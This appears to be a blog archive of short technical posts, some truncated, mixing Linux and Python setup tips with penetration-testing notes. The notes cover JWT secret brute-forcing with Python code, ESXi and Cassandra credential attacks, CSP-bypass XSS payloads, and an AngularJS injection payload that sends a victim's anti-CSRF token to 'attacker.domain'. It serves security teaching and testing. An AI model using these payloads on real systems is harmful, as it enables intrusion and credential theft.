
Posts

Showing posts from 2023

Attacking JSON Web Tokens - JWT Pentesting

  ... sign an unsigned token, the process is as follows (encodeBase64 here is URL-safe Base64 with the '=' padding stripped, as the JWT spec requires):
    unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload)
    signature_encoded = encodeBase64(HMAC-SHA256("secret", unsignedToken))
    jwt_token = encodeBase64(header) + "." + encodeBase64(payload) + "." + signature_encoded
  - JWT is not vulnerable to CSRF, except when the JWT is carried in a cookie (the browser then attaches it to cross-site requests automatically)
  - Session theft through an XSS attack is possible when the JWT is reachable from JavaScript (e.g. localStorage)
  - Improper token storage (HTML5 storage / cookie)
  - Sometimes the signing key is weak and can be brute-forced offline from a single captured token
  - Faulty token expiration (no exp claim, or exp not enforced server-side)
  - JWT can be used as a Bearer token in a custom Authorization header
  - JWT is used for stateless applications: there is no server-side storage and no database-backed session management; all information is placed inside the signed token
    - Security relies only on the secret key
    - Logging out or invalidating specific users is not possible with this stateless approach (a server-side denylist would reintroduce state)
    - The same signing key is used for everyone
  #HMAC S
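The signing recipe above, as an added Python example that is not code from the original post: it implements HS256 signing and verification with the base64url encoding JWTs actually use, pins the verifier to HS256 so an alg=none header is refused, and runs the offline dictionary attack the "weak key" bullet refers to. The secret "secret", the wordlist and the sample claims are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    """JWT uses base64url without '=' padding (RFC 7515), not plain Base64."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """unsignedToken = b64url(header) + '.' + b64url(payload); sig = HMAC-SHA256(secret, unsignedToken)."""
    unsigned = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(payload, separators=(",", ":")).encode())
    )
    signature = hmac.new(secret, unsigned.encode(), hashlib.sha256).digest()
    return unsigned + "." + b64url(signature)


def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the payload if `token` is a valid HS256 token under `secret`, else None.

    The algorithm is pinned on the verifier side: a header that says "none" (or an RS256
    header smuggled in for key confusion) is rejected before any signature check, which
    is the server-side fix for the classic JWT algorithm attacks.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:  # bad base64 / bad JSON / bad UTF-8
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):  # constant-time compare
        return None
    return json.loads(b64url_decode(payload_b64))


def brute_force_secret(token: str, wordlist: Iterable[str]) -> Optional[bytes]:
    """Offline dictionary attack on a captured token: every guess is checked locally,
    so there is no lockout, rate limit or server log to trip."""
    for word in wordlist:
        if verify_hs256(token, word.encode()) is not None:
            return word.encode()
    return None


if __name__ == "__main__":
    # Constructed sample: a token signed with the weak secret "secret" from the text.
    token = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "alice", "admin": False}, b"secret")
    print(token)
    print("recovered secret:", brute_force_secret(token, ["password", "123456", "secret"]))
```

Once the secret is recovered, `sign_hs256` with a modified payload (for example `"admin": True`) produces a token the server will accept; a real wordlist run would use something like rockyou.txt rather than the three-word list here.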

Make Permanent Changes on WSL - /etc/resolv.conf

  sudo bash
  # add an entry in resolv.conf - update the IP address as required
  echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  # make the file immutable; to update it again later, run: chattr -i /etc/resolv.conf
  chattr +i /etc/resolv.conf
  # add an entry in wsl.conf
  nano /etc/wsl.conf
  # add the lines below
  [boot]
  systemd=true
  [network]
  generateResolvConf = false
  exit
  # from a Windows prompt, restart WSL
  wsl --shutdown
  wsl
  # the changes should now be permanent

Using Python Virtual Environment

  # install venv
  sudo apt install python3-venv
  # create a new virtual env
  python3 -m venv .venv/project_name
  # enter the virtual env (the prompt changes once it is active)
  source .venv/project_name/bin/activate
  # leave the virtual env
  deactivate
  # install a package
  python -m pip install requests
  # reinstall everything in requirements.txt, also resolving from a local package directory
  pip install --upgrade --force-reinstall --ignore-installed -r requirements.txt \
      --extra-index-url file:///$PWD/lib
  # list installed packages
  python -m pip freeze

  Resolving "externally-managed-environment"
  × This environment is externally managed
  Either create a virtual env (preferred), or install the packages system-wide with --break-system-packages, which overrides the distro's protection of its own Python packages:
  pip install requests --break-system-packages

VMware ESXi Pentesting

  Reference Links
  1. SOAP API Guide
  2. Ports and Services
  3. vCenter Security Guide

  Port 902 - VMware Authentication Daemon (vmauthd)
  - It is possible to brute-force credentials on port 902 using Metasploit
  - Port 902 is reachable only when remote access is enabled
  - Uses Windows domain login creds, unless local access is set
  - Generally, this kind of service is not logged
  - Recommended to brute-force port 902 instead of RDP or SSH when

  # brute-forcing
  msfconsole
  use auxiliary/scanner/vmware/vmauthd_login
  set RHOSTS 10.10.10.10
  set USER_FILE users.txt
  set PASS_FILE passwords.txt
  run
  # manual access (the daemon speaks a plain USER/PASS dialogue)
  nc 10.10.10.10 902
  USER root
  PASS toor

Resolving Python Pip Issues

  Automatically create requirements.txt
  # install
  pip3 install pipreqs
  # run in the current directory
  python3 -m pipreqs.pipreqs .
  # python2
  pip install pipreqs
  python -m pipreqs.pipreqs .

  Reinstall pip
  sudo apt-get remove python3-pip
  # go to https://bootstrap.pypa.io/pip/ and download the get-pip.py matching your Python version
  python3 get-pip.py

  Installing pwntools
  apt-get update
  apt-get install -y python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
  python3 -m pip install --upgrade pip
  python3 -m pip install --upgrade pwntools

OpenVPN Client Issues

Errors:
  OpenSSL: error:0A00018E:SSL routines::ca md too weak
  AUTH_FAILED,Data channel cipher negotiation failed (no shared cipher)
  DEPRECATED OPTION: --cipher set to 'AES-128-CBC' but missing in --data-ciphers
The first error means the client's OpenSSL security level rejects the signature digest on the server's CA certificate (typically SHA-1); the other two mean the server's AES-128-CBC data channel cipher is not in the client's --data-ciphers list. Update the config file as below:
  client
  dev tun
  allow-compression yes
  proto udp
  remote edge-us-fort-1.hackthebox.eu 1337
  resolv-retry infinite
  nobind
  persist-key
  persist-tun
  remote-cert-tls server
  comp-lzo
  verb 3
  data-ciphers-fallback AES-128-CBC
  auth SHA256
  key-direction 1
  tls-cert-profile insecure
Note that tls-cert-profile insecure and allow-compression yes both lower the client's security (weak-digest CAs are accepted, and compression is enabled on an encrypted channel); they are acceptable for a lab VPN like this one, not for a production profile.

Pentesting AngularJS

Template Injection & Scope Hacking
- The attack is limited to $scope functions and variables
- Check whether the application uses AngularJS and is vulnerable to template injection:
  - Check the source code for the `angular` keyword
  - Open dev tools --> Console --> `angular.element($0).scope()` ($0 is the element currently selected in the Elements/Inspector tab); this lists the scope of the selected element
  - Check the source code of the scope functions to see what they do: Developer tools --> Debugger --> select app.js (or whatever the JS file is named) --> search for that function
  - Check for any injectable variables (e.g. some empty or dynamic content)
  - Call the function: send the payload below as input and watch for the outbound connection carrying the victim's anti-CSRF token
    `{{Function_Name("https://attacker.domain/reach.php?x="+anti_csrf)}}`
  - Input `{{4-1}}` --> if the output is 3 --> VULNERABLE; use this in any input or search parameter
Going Beyond the Scope - XSS via Templat

Bypassing Content-Security-Policy

- CSP can be implemented via:
  - Response header
  - Meta tag: <meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">
- Bypass CSP via: ajax.googleapis.com, Flash file, polyglot file, AngularJS

Bypass CSP via ajax.googleapis.com
Check `Content-Security-Policy: script-src 'self' ajax.googleapis.com`; here `script-src 'self' ajax.googleapis.com` means only same-origin scripts plus scripts from ajax.googleapis.com are allowed. Because that host serves both AngularJS builds and a JSONP endpoint (whose callback parameter becomes script text), whitelisting it is enough to run attacker-chosen code:
<div ng-app ng-csp id=p ng-click=$event.view.alert("XSS")>
<script src="//ajax.googleapis.com/ajax/libs/angular/1.6.6/angular.min.js"></script>
<script async src=//ajax.googleapis.com/jsapi?callback=p.click></script>

Bypass CSP via Flash File
Works if the CSP is `Content-Security-Policy: script-src 'self'`; when the only restriction is script-src (no object-src or default-src to fall back on), we can bypass it using a Flash file. Current browsers no longer run Flash, so this path matters mainly for legacy clients, but an unrestricted object-src is still the finding to report.
<object t
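A small policy checker, added here as an example (not code from the original post), that parses a Content-Security-Policy value and flags the two weaknesses the bypasses above rely on: a script-src that whitelists a JSONP/AngularJS-hosting CDN such as ajax.googleapis.com, and an object-src left unrestricted (the Flash <object> case). It also accounts for 'unsafe-inline' and for 'strict-dynamic', which makes host whitelists inert. The set of CDN hosts is an assumption for the example, seeded with the host the text names.

```python
from typing import Dict, List

# Hosts known to serve JSONP endpoints or AngularJS builds (the page's ajax.googleapis.com
# case). Whitelisting any of them in script-src lets an attacker load code of their choosing.
# The set is an assumption for this example; extend it from your own notes.
JSONP_OR_ANGULAR_HOSTS = {"ajax.googleapis.com", "cdnjs.cloudflare.com", "www.google.com"}


def parse_csp(header: str) -> Dict[str, List[str]]:
    """'script-src a b; object-src c' -> {'script-src': ['a', 'b'], 'object-src': ['c']}."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy.setdefault(tokens[0].lower(), []).extend(tokens[1:])
    return policy


def effective_sources(policy: Dict[str, List[str]], name: str) -> List[str]:
    """script-src and object-src fall back to default-src; absent both means unrestricted."""
    return policy.get(name, policy.get("default-src", []))


def host_of(source: str) -> str:
    """'https://ajax.googleapis.com:443/ajax/' -> 'ajax.googleapis.com'."""
    return source.split("//")[-1].split("/")[0].split(":")[0].lower()


def csp_findings(header: str) -> List[str]:
    policy = parse_csp(header)
    script = effective_sources(policy, "script-src")
    obj = effective_sources(policy, "object-src")
    findings: List[str] = []

    # A nonce or hash makes browsers ignore 'unsafe-inline', so only flag it when it is live.
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script
    )
    if "'unsafe-inline'" in script and not has_nonce_or_hash:
        findings.append("unsafe-inline")  # plain <script> injection works

    # 'strict-dynamic' disables host whitelists, so the CDN bypass only applies without it.
    if "'strict-dynamic'" not in script:
        for source in script:
            if host_of(source) in JSONP_OR_ANGULAR_HOSTS:
                findings.append("jsonp-host:" + host_of(source))

    # Flash/plugin bypass: nothing blocks <object> unless object-src (or default-src) says 'none'.
    if "'none'" not in obj:
        findings.append("object-src-open")
    return findings


if __name__ == "__main__":
    for sample in (
        "script-src 'self' ajax.googleapis.com",
        "script-src 'self'",
        "default-src 'self'; object-src 'none'",
    ):
        print(f"{sample!r:55} -> {csp_findings(sample)}")
```

Feed it the value of the response header or the meta tag's content attribute; an empty list means none of the page's bypass classes apply, not that the policy is sound.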

Simple Web Pentest Checklist

  - Fuzz the application
  - Use testssl.sh to look for SSL/TLS issues and vulnerabilities
  - Run Nikto, Nuclei, dirsearch.py and BlackWidow against the target
  - Check if the application uses AngularJS; look for the version and its known vulnerabilities
  - Check for a Content Security Policy
  - Check for Cross-Origin Resource Sharing:
    - Change the Origin header domain and see whether it is reflected in the response: Origin: somerandomdomain.com
    - Add multiple Origin headers and see the response
    - Add a port, special chars or null strings to it and observe the changes
  - Look for Host header injection attacks:
    - Add an extra Host header
    - Add an X-Forwarded-For: somerandomdomain.com header and see whether it is reflected or not
  - Look for cached responses (filter for the keyword "Cache" in Burp HTTP history); web cache poisoning might be possible
  - Check whether the HttpOnly and Secure flags are set on the cookies, and whether HSTS is present
  - Check if .git exists and see if you can use https://git

Installing Checksec

  $ CHECKSEC_STABLE=$(curl -s https://api.github.com/repos/slimm609/checksec.sh/releases/latest | awk '/"tag_name"/{ print $2 }' | sed 's/"//g;s/,//')
  $ curl -s -o checksec https://raw.githubusercontent.com/slimm609/checksec.sh/${CHECKSEC_STABLE}/checksec
  $ curl -s -o checksec.sig https://raw.githubusercontent.com/slimm609/checksec.sh/${CHECKSEC_STABLE}/checksec.sig
  $ curl -s -o checksec.pub https://raw.githubusercontent.com/slimm609/checksec.sh/${CHECKSEC_STABLE}/checksec.pub
  # verify the script against the release signature before running it
  $ openssl dgst -sha256 -verify checksec.pub -signature checksec.sig checksec
  Verified OK
  $ chmod u+x checksec
  $ ./checksec --file=vuln
  $ ./checksec --file=/bin/sh

Casandra DB Pentest - Port 9042

  Install cqlsh
  sudo apt update
  sudo apt install openjdk-8-jdk
  sudo apt install apt-transport-https
  wget -q -O - https://www.apache.org/dist/cassandra/KEYS | sudo apt-key add -
  sudo sh -c 'echo "deb http://www.apache.org/dist/cassandra/debian 311x main" > /etc/apt/sources.list.d/cassandra.list'
  sudo apt update
  sudo apt install cassandra

  Commands to get data
  sudo cqlsh 10.10.10.10
  # list keyspaces (databases)
  SELECT keyspace_name FROM system.schema_keyspaces;
  SELECT * FROM system.schema_keyspaces;
  # select a keyspace
  USE DB_NAME;
  USE system_auth;
  # list tables from the keyspace "system"
  SELECT columnfamily_name FROM system.schema_columnfamilies WHERE keyspace_name = 'system';
  # list tables and columns
  SELECT column_name, type, validator FROM system.schema_columns WHERE keyspace_name = 'system_auth' AND columnfamily_name = 'roles';
  # dump role names and password hashes
  SELECT * FROM system_auth.roles;
  The system.schema_* tables above are the Cassandra 2.x schema; on 3.x they were replaced by system_schema.keyspaces, system_schema.tables and system_schema.columns (filtered on keyspace_name / table_name), so if cqlsh reports the table as unconfigured, rerun the queries against system_schema.
  Ref: Configuring firewall port access | Apache Cassandra 3.

Terminal Color Coding - tput

  Value  Color
  0      Black
  1      Red
  2      Green
  3      Yellow
  4      Blue
  5      Magenta
  6      Cyan
  7      White
  8      Not used
  9      Reset to default color

Example
  green=`tput setaf 2`
  red=`tput setaf 1`
  reset=`tput sgr0`
  echo -e "\n${green}########## Display Text in GREEN Color ########## ${reset} \n"
  echo -e "\n${red}########## Display Text in RED Color ########## ${reset} \n"

Customize Bash Prompt in Linux
  # set it permanently
  nano ~/.bashrc
  # at the end of the file, paste the line below and save it
  PS1="\e[1;34m[\u - \W]\$ \e[0m"
  # \u = username; \H = hostname; \W = basename of the current directory
  export PS1="\u# "
  # hide everything except the last directory
  export PS1="\W > "
  # show username with last directory in color
  export PS1="\e[0;32m[\u - \W]\$ \e[0m"
  export PS1="\e[1;34m[\u - \W]\$ \e[0m"
• \e[ – begin color changes
• 0;32m – the color code
• [\u@\h \W]\$ – the normal BASH prompt (username@hostname workingdirectory $)
• \e[0m – exit color-change mode
The first number in the